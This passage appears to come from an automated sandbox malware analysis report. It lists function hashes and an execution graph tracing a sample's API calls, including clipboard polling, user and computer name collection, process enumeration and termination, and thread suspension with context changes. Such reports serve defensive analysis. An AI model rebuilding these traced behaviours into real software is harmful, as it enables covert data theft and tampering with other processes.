                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocateFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                                                  • API String ID: 1425038354-2104205924
                                                                                                                                                                                                                                  • Opcode ID: e4c39169c09cded51a25f3a767d414fe08df9f2a4f193daad58e20fe5f83f0a0
                                                                                                                                                                                                                                  • Instruction ID: ba21277372282e1603481e97638a2fef3cc736bb9c19bd80c4fe57512ceb8bd9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4c39169c09cded51a25f3a767d414fe08df9f2a4f193daad58e20fe5f83f0a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7018E61B4E74BE1EE14DB51A1411B96B94BF44784F4800B8EEDD87B96EE3CE195C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThread$Wow64_errno_invalid_parameter_noinfowprintf
                                                                                                                                                                                                                                  • String ID: Wow64 cannot get context!
                                                                                                                                                                                                                                  • API String ID: 2477128119-1106426053
                                                                                                                                                                                                                                  • Opcode ID: 4999a02bfc8a9acc23dd043b8d36f2ea78b7b9e6abab2f354ccf68f0371edbc1
                                                                                                                                                                                                                                  • Instruction ID: d1e3dece416bc3889b25e2c03c1c1f8e7c243d1bea41868e2cec0c98d39d7e03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4999a02bfc8a9acc23dd043b8d36f2ea78b7b9e6abab2f354ccf68f0371edbc1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B115422B5D586D1EA20DB21D4553BAABA1FF88B48F844079DDCDC7656DF3CE109CB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 8df5b08c0c95267d4fc504f4daeca9d20b75a67ec837629c271e3000a9b8d5ad
                                                                                                                                                                                                                                  • Instruction ID: e2fc7b43599227c67db801e947eee7937f7d2cc141864d1afa4c66053e96fcb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8df5b08c0c95267d4fc504f4daeca9d20b75a67ec837629c271e3000a9b8d5ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D01A722906243D5D7609F31C5812BC2761FF46B4CF4C5479DDAE9A746CF28E4C5C341
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: fgetwc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2948136663-0
                                                                                                                                                                                                                                  • Opcode ID: 270a7e8411d6cd5abbe19e84f8925f05c23d6076662a07ad26dd70cf8d972d8c
                                                                                                                                                                                                                                  • Instruction ID: d31509c9380df05e2f9314b8e9f3eae906d427e2e44cd6086dbb5ec5144a6ae6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 270a7e8411d6cd5abbe19e84f8925f05c23d6076662a07ad26dd70cf8d972d8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97611472646E41E8EB608F25C0903AC37A5FF48B98F50467AEE9E87B99DF38D554C340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wfsopen$fclosefseek
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1261181034-0
                                                                                                                                                                                                                                  • Opcode ID: d296ae792a9aff958ac7c05d1efbcdad30604534304ee641b514fefb29055e6a
                                                                                                                                                                                                                                  • Instruction ID: 8d8c1b868cef7dea815b02392b6b031228fe90cc39209cd1becf42433228516d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d296ae792a9aff958ac7c05d1efbcdad30604534304ee641b514fefb29055e6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2218021B1AA42E9EA64961A97417756E91BF48BC4F9C40B8CFCEC7791DE2DE401C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00007FF68A18761C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time_getptd$FileSystem_time64rand
                                                                                                                                                                                                                                  • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                                                  • API String ID: 603874196-768110321
                                                                                                                                                                                                                                  • Opcode ID: 7199f471a72000376f316458dbe7da9a004cb7d33198a7dd0b0b46129a5e6147
                                                                                                                                                                                                                                  • Instruction ID: c5c0080743cad2c3d4148659bf29d2b387b4da50d7e2022751089fcab3fbc9c9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7199f471a72000376f316458dbe7da9a004cb7d33198a7dd0b0b46129a5e6147
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD313A32B0AB65D9EB009BA5A8513AC3BB5BB48794F5001B9DE9CA7795EF3CA054C340

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:2.1%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:98.3%
                                                                                                                                                                                                                                  Signature Coverage:11.9%
                                                                                                                                                                                                                                  Total number of Nodes:402
                                                                                                                                                                                                                                  Total number of Limit Nodes:18
                                                                                                                                                                                                                                  execution_graph 49050 8b9ad08 49056 8b9ad43 49050->49056 49051 8b9afac VirtualAlloc 49052 8b9aff1 CreateFileMappingA 49051->49052 49053 8b9afd7 49051->49053 49054 8b9b03a MapViewOfFile 49052->49054 49055 8b9b055 49052->49055 49053->49052 49054->49055 49056->49051 49064 8cbc000 49103 8cbc4bc 49064->49103 49067 8cbc4bc 44 API calls 49068 8cbc03d 49067->49068 49110 8cb2fc4 49068->49110 49070 8cbc04a _DllMainCRTStartup 49071 8cbc06c _setmbcp_nolock 49070->49071 49072 8cbc060 lstrcpyA 49070->49072 49073 8cbc087 SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 49071->49073 49072->49071 49074 8cbc0fe lstrcmpiA 49073->49074 49075 8cbc17c lstrcatA 49073->49075 49074->49075 49076 8cbc112 lstrcmpiA 49074->49076 49077 8cbc176 49075->49077 49076->49075 49078 8cbc126 lstrcmpiA 49076->49078 49127 8cbc430 49077->49127 49078->49075 49080 8cbc13a lstrcmpiA 49078->49080 49080->49075 49081 8cbc14e lstrcmpiA 49080->49081 49081->49075 49082 8cbc162 lstrcmpiA 49081->49082 49082->49075 49082->49077 49083 8cbc1ac 49084 8cbc3a1 49083->49084 49086 8cbc233 49083->49086 49136 8cb2f84 49084->49136 49088 8cbc253 _setmbcp_nolock 49086->49088 49134 8cbc3e0 GetNativeSystemInfo IsWow64Process 49086->49134 49087 8cbc3a9 49089 8cb2f84 free 5 API calls 49087->49089 49091 8cbc282 wsprintfA CreateFileA WriteFile WriteFile 49088->49091 49092 8cbc3b1 49089->49092 49094 8cbc398 _close_nolock 49091->49094 49095 8cbc310 6 API calls 49091->49095 49096 8cb2f84 free 5 API calls 49092->49096 49093 8cbc241 49097 8cbc25c TerminateProcess 49093->49097 49098 8cbc245 49093->49098 49094->49084 49095->49094 49099 8cbc3b9 49096->49099 49097->49088 49135 8cbc55c 53 API calls 5 library calls 49098->49135 49101 8cb2f84 free 5 API calls 49099->49101 49102 8cbc3c1 49101->49102 49104 8cbc032 49103->49104 49105 8cbc4d7 WideCharToMultiByte 49103->49105 49104->49067 49105->49104 49106 8cbc508 49105->49106 49107 8cb2fc4 malloc 42 API calls 49106->49107 49108 8cbc512 49107->49108 49108->49104 49109 8cbc51a WideCharToMultiByte 49108->49109 49109->49104 49111 8cb3058 49110->49111 49124 8cb2fdc 49110->49124 49146 8cb3854 DecodePointer 49111->49146 49113 8cb3014 HeapAlloc 49117 8cb304d 49113->49117 49113->49124 49114 8cb305d 49147 8cb37b8 5 API calls _getptd_noexit 49114->49147 49117->49070 49118 8cb303d 49144 8cb37b8 5 API calls _getptd_noexit 49118->49144 49122 8cb3042 49145 8cb37b8 5 API calls _getptd_noexit 49122->49145 49123 8cb2ff4 49123->49113 49140 8cb3d7c 39 API calls 2 library calls 49123->49140 49141 8cb3df0 39 API calls 6 library calls 49123->49141 49142 8cb38d4 GetProcAddress ExitProcess __crtCorExitProcess 49123->49142 49124->49113 49124->49118 49124->49122 49124->49123 49143 8cb3854 DecodePointer 49124->49143 49128 8cbc44b MultiByteToWideChar 49127->49128 49129 8cbc447 49127->49129 49128->49129 49130 8cbc470 49128->49130 49129->49083 49131 8cb2fc4 malloc 42 API calls 49130->49131 49132 8cbc47d 49131->49132 49132->49129 49133 8cbc485 MultiByteToWideChar 49132->49133 49133->49129 49134->49093 49135->49088 49137 8cb2f89 free 49136->49137 49139 8cb2fa9 free _write_nolock 49136->49139 49137->49139 49148 8cb37b8 5 API calls _getptd_noexit 49137->49148 49139->49087 49140->49123 49141->49123 49143->49124 49144->49122 49145->49117 49146->49114 49147->49117 49148->49139 49149 f3dd570 49150 f3dd58c 49149->49150 49153 f3dd591 49149->49153 49163 f3e2e74 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 QueryPerformanceCounter 49150->49163 49152 f3dd61c 49160 f3dd5e6 49152->49160 49165 f3da2b4 49152->49165 49153->49152 49153->49160 49164 f3dd418 63 API calls 14 library calls 49153->49164 49155 f3dd63a 49157 f3dd663 49155->49157 49159 f3da2b4 _DllMainCRTStartup 354 API calls 49155->49159 49157->49160 49172 f3dd418 63 API calls 14 library calls 49157->49172 49161 f3dd656 49159->49161 49171 f3dd418 63 API calls 14 library calls 49161->49171 49163->49153 49164->49152 49166 f3da2bc 49165->49166 49170 f3da2ca _DllMainCRTStartup 49165->49170 49166->49170 49173 f3c2854 LoadLibraryA 49166->49173 49168 f3da2c5 49178 f3da104 49168->49178 49170->49155 49171->49157 49172->49160 49174 f3c34c1 __crtMessageBoxW _DllMainCRTStartup 49173->49174 49175 f3c3585 __crtMessageBoxW _DllMainCRTStartup 49174->49175 49176 f3c35d7 156 API calls 49175->49176 49177 f3c44a7 _DllMainCRTStartup 49176->49177 49177->49168 49197 f3c68cc 49178->49197 49181 f3da159 _DllMainCRTStartup 49182 f3da162 CreateThread 49181->49182 49183 f3da18a _DllMainCRTStartup 49181->49183 49199 f3c6f38 49182->49199 49325 f3cf94c 49182->49325 49184 f3da19e 49183->49184 49187 f3da1c5 _DllMainCRTStartup 49183->49187 49204 f3da214 CreateToolhelp32Snapshot Process32Next CloseHandle _DllMainCRTStartup 49184->49204 49190 f3da1e3 _DllMainCRTStartup 49187->49190 49207 f3c80cc 36 API calls _DllMainCRTStartup 49187->49207 49188 f3da1a8 49205 f3c66d4 GetNativeSystemInfo _DllMainCRTStartup 49188->49205 49191 f3da201 49190->49191 49208 f3c81a8 36 API calls _DllMainCRTStartup 49190->49208 49191->49170 49192 f3da1b3 49192->49191 49194 f3da1b7 CloseHandle 49192->49194 49206 f3d7ec0 72 API calls _DllMainCRTStartup 49194->49206 49198 f3c68d9 GetModuleFileNameA PathFindFileNameA 49197->49198 49198->49181 49209 f3c6dc0 49199->49209 49204->49188 49205->49192 49207->49190 49208->49191 49210 f3c6df5 _ld12tod 49209->49210 49211 f3c6e5b GetUserNameW GetComputerNameW 49210->49211 49232 f3c678c 49211->49232 49214 f3c678c _DllMainCRTStartup 3 API calls 49215 f3c6ea4 GetNativeSystemInfo 49214->49215 49237 f3fe980 49215->49237 49233 f3c67a7 WideCharToMultiByte 49232->49233 49234 f3c67a3 49232->49234 49233->49234 49235 f3c67d8 _malloc_dbg 49233->49235 49234->49214 49235->49234 49236 f3c67ea WideCharToMultiByte 49235->49236 49236->49234 49238 f3fe987 49237->49238 49436 f3cff20 49325->49436 49330 f3c10e8 _DllMainCRTStartup 26 API calls 49331 f3cf98b 49330->49331 49332 f3c10e8 _DllMainCRTStartup 26 API calls 49331->49332 49333 f3cf99c 49332->49333 49453 f3cfda0 49333->49453 49335 f3cf9af _DllMainCRTStartup 49336 f3c10e8 _DllMainCRTStartup 26 API calls 49335->49336 49337 f3cf9d0 49336->49337 49338 f3c10e8 _DllMainCRTStartup 26 API calls 49337->49338 49339 f3cf9e1 49338->49339 49340 f3cfda0 26 API calls 49339->49340 49341 f3cf9f4 _DllMainCRTStartup 49340->49341 49342 f3c10e8 _DllMainCRTStartup 26 API calls 49341->49342 49343 f3cfa15 49342->49343 49344 f3c10e8 _DllMainCRTStartup 26 API calls 49343->49344 49345 f3cfa26 49344->49345 49346 f3cfda0 26 API calls 49345->49346 49347 f3cfa39 _DllMainCRTStartup 49346->49347 49348 f3c10e8 _DllMainCRTStartup 26 API calls 49347->49348 49349 f3cfa5a 49348->49349 49350 f3c10e8 _DllMainCRTStartup 26 API calls 49349->49350 49351 f3cfa6b 49350->49351 49352 f3cfda0 26 API calls 49351->49352 49353 f3cfa7e _DllMainCRTStartup 49352->49353 49458 f3cfe98 OpenClipboard 49353->49458 49357 f3cfaab 49474 f3cffa4 49357->49474 49359 f3cfac9 49360 f3cfacd 49359->49360 49361 f3cfb33 49359->49361 49363 f3c7af4 _DllMainCRTStartup 26 API calls 49360->49363 49362 f3c7af4 _DllMainCRTStartup 26 API calls 49361->49362 49364 f3cfb42 49362->49364 49365 f3cfada 49363->49365 49368 f3cffa4 55 API calls 49364->49368 49366 f3c7af4 _DllMainCRTStartup 26 API calls 49365->49366 49367 f3cfaeb 49366->49367 49480 f3d000c 55 API calls _DllMainCRTStartup 49367->49480 49369 f3cfb60 49368->49369 49370 f3cfbca 49369->49370 49371 f3cfb64 49369->49371 49373 f3c7af4 _DllMainCRTStartup 26 API calls 49370->49373 49374 f3c7af4 _DllMainCRTStartup 26 API calls 49371->49374 49376 f3cfbd9 49373->49376 49377 f3cfb72 49374->49377 49375 f3cfb12 49378 f3c7af4 _DllMainCRTStartup 26 API calls 49375->49378 49383 f3cffa4 55 API calls 49376->49383 49379 f3c7af4 _DllMainCRTStartup 26 API calls 49377->49379 49380 f3cfb21 49378->49380 49381 f3cfb83 49379->49381 49481 f3d006c 7 API calls 2 library calls 49380->49481 49482 f3d000c 55 API calls _DllMainCRTStartup 49381->49482 49385 f3cfbf7 49383->49385 49386 f3cfbfb 49385->49386 49387 f3cfc61 49385->49387 49390 f3c7af4 _DllMainCRTStartup 26 API calls 49386->49390 49389 f3c7af4 _DllMainCRTStartup 26 API calls 49387->49389 49393 f3cfc70 49389->49393 49394 f3cfc09 49390->49394 49391 f3cfba9 49392 f3c7af4 _DllMainCRTStartup 26 API calls 49391->49392 49395 f3cfbb8 49392->49395 49400 f3cffa4 55 API calls 49393->49400 49396 f3c7af4 _DllMainCRTStartup 26 API calls 49394->49396 49483 f3d006c 7 API calls 2 library calls 49395->49483 49397 f3cfc1a 49396->49397 49484 f3d000c 55 API calls _DllMainCRTStartup 49397->49484 49401 f3cfc8e 49400->49401 49402 f3cfcf8 49401->49402 49403 f3cfc92 49401->49403 49405 f3c7af4 _DllMainCRTStartup 26 API calls 49402->49405 49406 f3c7af4 _DllMainCRTStartup 26 API calls 49403->49406 49408 f3cfd07 49405->49408 49409 f3cfca0 49406->49409 49407 f3cfc40 49410 f3c7af4 _DllMainCRTStartup 26 API calls 49407->49410 49415 f3cffa4 55 API calls 49408->49415 49411 f3c7af4 _DllMainCRTStartup 26 API calls 49409->49411 49412 f3cfc4f 49410->49412 49413 f3cfcb1 49411->49413 49485 f3d006c 7 API calls 2 library calls 49412->49485 49486 f3d000c 55 API calls _DllMainCRTStartup 49413->49486 49417 f3cfd25 49415->49417 49418 f3cfd8f Sleep SleepEx 49417->49418 49419 f3cfd29 49417->49419 49421 f3c7af4 _DllMainCRTStartup 26 API calls 49419->49421 49423 f3cfd37 49421->49423 49422 f3cfcd7 49424 f3c7af4 _DllMainCRTStartup 26 API calls 49422->49424 49425 f3c7af4 _DllMainCRTStartup 26 API calls 49423->49425 49426 f3cfce6 49424->49426 49427 f3cfd48 49425->49427 49487 f3d006c 7 API calls 2 library calls 49426->49487 49488 f3d000c 55 API calls _DllMainCRTStartup 49427->49488 49431 f3cfd6e 49432 f3c7af4 _DllMainCRTStartup 26 API calls 49431->49432 49433 f3cfd7d 49432->49433 49489 f3d006c 7 API calls 2 library calls 49433->49489 49490 f3cfe6c LoadLibraryA 49436->49490 49439 f3cfe6c 2 API calls 49440 f3cff52 49439->49440 49441 f3cfe6c 2 API calls 49440->49441 49442 f3cff68 49441->49442 49443 f3cfe6c 2 API calls 49442->49443 49444 f3cff7e 49443->49444 49445 f3cfe6c 2 API calls 49444->49445 49446 f3cf96b 49445->49446 49447 f3c10e8 49446->49447 49448 f3c1102 _DllMainCRTStartup 49447->49448 49493 f3c21dc 49448->49493 49450 f3c111a 49451 f3c2374 _DllMainCRTStartup 26 API calls 49450->49451 49452 f3c1125 49451->49452 49452->49330 49498 f3d69ec 49453->49498 49455 f3cfdc8 _DllMainCRTStartup 49502 f3ce2d8 49455->49502 49457 f3cfde0 _DllMainCRTStartup 49457->49335 49459 f3cfeb8 GetClipboardData 49458->49459 49460 f3cfefb 49458->49460 49461 f3cfec9 GlobalLock 49459->49461 49462 f3cfee3 CloseClipboard 49459->49462 49463 f3c7af4 _DllMainCRTStartup 26 API calls 49460->49463 49461->49462 49464 f3cfed7 GlobalUnlock 49461->49464 49462->49460 49465 f3cfeee 49462->49465 49466 f3cfa9c 49463->49466 49464->49462 49467 f3c10e8 _DllMainCRTStartup 26 API calls 49465->49467 49468 f3c7af4 49466->49468 49467->49466 49469 f3c7b11 Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 49468->49469 49470 f3c21dc _DllMainCRTStartup free 49469->49470 49471 f3c7b36 49470->49471 49540 f3c22a4 49471->49540 49473 f3c7b48 49473->49357 49475 f3cffc6 49474->49475 49560 f3cd4d4 49475->49560 49479 f3cffe5 _DllMainCRTStartup 49479->49359 49480->49375 49482->49391 49484->49407 49486->49422 49488->49431 49491 f3cfe80 GetProcAddress 49490->49491 49492 f3cfe92 49490->49492 49491->49492 49492->49439 49494 f3c223f 49493->49494 49495 f3c21fa char_traits Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 49493->49495 49495->49494 49497 f3c244c free 49495->49497 49499 f3d6a04 _DllMainCRTStartup 49498->49499 49508 f3d6a30 49499->49508 49501 f3d6a21 49501->49455 49503 f3ce2fa _DllMainCRTStartup 49502->49503 49504 f3c21dc _DllMainCRTStartup free 49503->49504 49505 f3ce312 49504->49505 49517 f3d698c 49505->49517 49507 f3ce320 49507->49457 49509 f3d6a5b 49508->49509 49511 f3d6a6c 49508->49511 49510 f3c10e8 _DllMainCRTStartup 26 API calls 49509->49510 49515 f3d6a67 _DllMainCRTStartup 49510->49515 49512 f3ce2d8 26 API calls 49511->49512 49513 f3d6ac3 _DllMainCRTStartup 49512->49513 49516 f3c7a9c free Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 49513->49516 49515->49501 49516->49515 49518 f3d69aa 49517->49518 49519 f3d69e4 49517->49519 49526 f3c20e4 49518->49526 49537 f3c2268 25 API calls Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack 49519->49537 49522 f3d69b2 _DllMainCRTStartup 49522->49507 49527 f3c2106 _DllMainCRTStartup 49526->49527 49528 f3c216e 49527->49528 49529 f3c210b 49527->49529 49539 f3c2268 25 API calls Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack 49528->49539 49530 f3c2111 49529->49530 49534 f3c2122 49529->49534 49538 f3c1fb4 free char_traits Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 49530->49538 49535 f3c21dc _DllMainCRTStartup free 49534->49535 49536 f3c2120 _DllMainCRTStartup 49534->49536 49535->49536 49536->49522 49538->49536 49541 f3c22d1 _DllMainCRTStartup 49540->49541 49542 f3c2369 49541->49542 49543 f3c22da _DllMainCRTStartup 49541->49543 49559 f3c227c 25 API calls _DllMainCRTStartup 49542->49559 49545 f3c230f 49543->49545 49546 f3c22f7 49543->49546 49547 f3c20e4 _DllMainCRTStartup 26 API calls 49545->49547 49557 f3c25bc 25 API calls _DllMainCRTStartup 49546->49557 49550 f3c230d char_traits _DllMainCRTStartup 49547->49550 49549 f3c2300 49558 f3c2540 25 API calls _DllMainCRTStartup 49549->49558 49550->49473 49557->49549 49558->49550 49561 f3cd501 49560->49561 49568 f3cb920 49561->49568 49564 f3cec30 49566 f3cec5c Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack 49564->49566 49565 f3d637c 49565->49479 49566->49565 49587 f3c244c free 49566->49587 49570 f3cb95d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack 49568->49570 49569 f3cb961 49569->49564 49570->49569 49581 f3cdce0 26 API calls _DllMainCRTStartup 49570->49581 49572 f3cb9c5 49582 f3cb218 55 API calls 2 library calls 49572->49582 49574 f3cba9f 49586 f3ceac0 free 49574->49586 49576 f3cb9d5 Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 49576->49574 49578 f3cba93 49576->49578 49583 f3cb488 55 API calls 49576->49583 49584 f3d5d34 55 API calls Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack 49576->49584 49585 f3cb488 55 API calls 49578->49585 49581->49572 49582->49576 49583->49576 49584->49576 49585->49574 49588 8cbbf44 49603 8cb1bb4 49588->49603 49590 8cbbf4f __crtIsPackagedApp _DllMainCRTStartup 49591 8cbbf88 GetProcAddress 49590->49591 49592 8cbbfa5 __crtIsPackagedApp 49590->49592 49591->49592 49593 8cbbf9d 49591->49593 49595 8cbbfb7 GetProcAddress 49592->49595 49596 8cbbfd4 49592->49596 49616 8cb1bf4 49593->49616 49595->49596 49598 8cbbfcc 49595->49598 49597 8cb1bb4 _DllMainCRTStartup Sleep 49596->49597 49599 8cbbfd9 49597->49599 49600 8cb1bf4 _DllMainCRTStartup 14 API calls 49598->49600 49601 8cbbfec 49599->49601 49608 8cb1aec 49599->49608 49600->49596 49604 8cb1bc5 49603->49604 49605 8cb1be6 49604->49605 49606 8cb1bcb Sleep 49604->49606 49605->49590 49606->49604 49609 8cb1b30 49608->49609 49610 8cb1b0f 49608->49610 49609->49601 49610->49609 49636 8cb167c CreateToolhelp32Snapshot 49610->49636 49612 8cb1b8d 49612->49609 49658 8cb197c 49612->49658 49613 8cb1b4c 49613->49612 49650 8cb19ec 49613->49650 49617 8cb1bb4 _DllMainCRTStartup Sleep 49616->49617 49618 8cb1c21 49617->49618 49627 8cb1d6e 49618->49627 49663 8cb2418 VirtualQuery 49618->49663 49620 8cb1c36 49620->49627 49664 8cb2418 VirtualQuery 49620->49664 49622 8cb1d9f 49622->49592 49624 8cb1c4d 49624->49627 49665 8cb21ac GetSystemInfo 49624->49665 49676 8cb3620 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __crtCapturePreviousContext 49627->49676 49629 8cb1cbf 49630 8cb1d61 49629->49630 49631 8cb1cc7 49629->49631 49675 8cb23b0 VirtualFree 49630->49675 49674 8cb15d8 HeapAlloc HeapReAlloc 49631->49674 49634 8cb1ccc 49634->49630 49635 8cb1cd8 49634->49635 49635->49627 49640 8cb17a6 _close_nolock _DllMainCRTStartup 49636->49640 49648 8cb16e0 _DllMainCRTStartup 49636->49648 49637 8cb18e2 49662 8cb3620 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __crtCapturePreviousContext 49637->49662 49639 8cb18f1 49639->49613 49640->49637 49643 8cb17e4 SuspendThread 49640->49643 49649 8cb18a9 SetThreadContext 49640->49649 49641 8cb178c Thread32Next 49641->49648 49642 8cb1707 GetCurrentProcessId 49642->49641 49644 8cb1713 GetCurrentThreadId 49642->49644 49643->49640 49644->49641 49644->49648 49645 8cb1727 HeapAlloc 49645->49640 49646 8cb174b 49645->49646 49646->49648 49647 8cb1755 HeapReAlloc 49647->49640 49647->49648 49648->49640 49648->49641 49648->49642 49648->49645 49648->49647 49649->49640 49651 8cb1a1d 49650->49651 49652 8cb1a25 VirtualProtect 49650->49652 49651->49652 49653 8cb1a40 49652->49653 49654 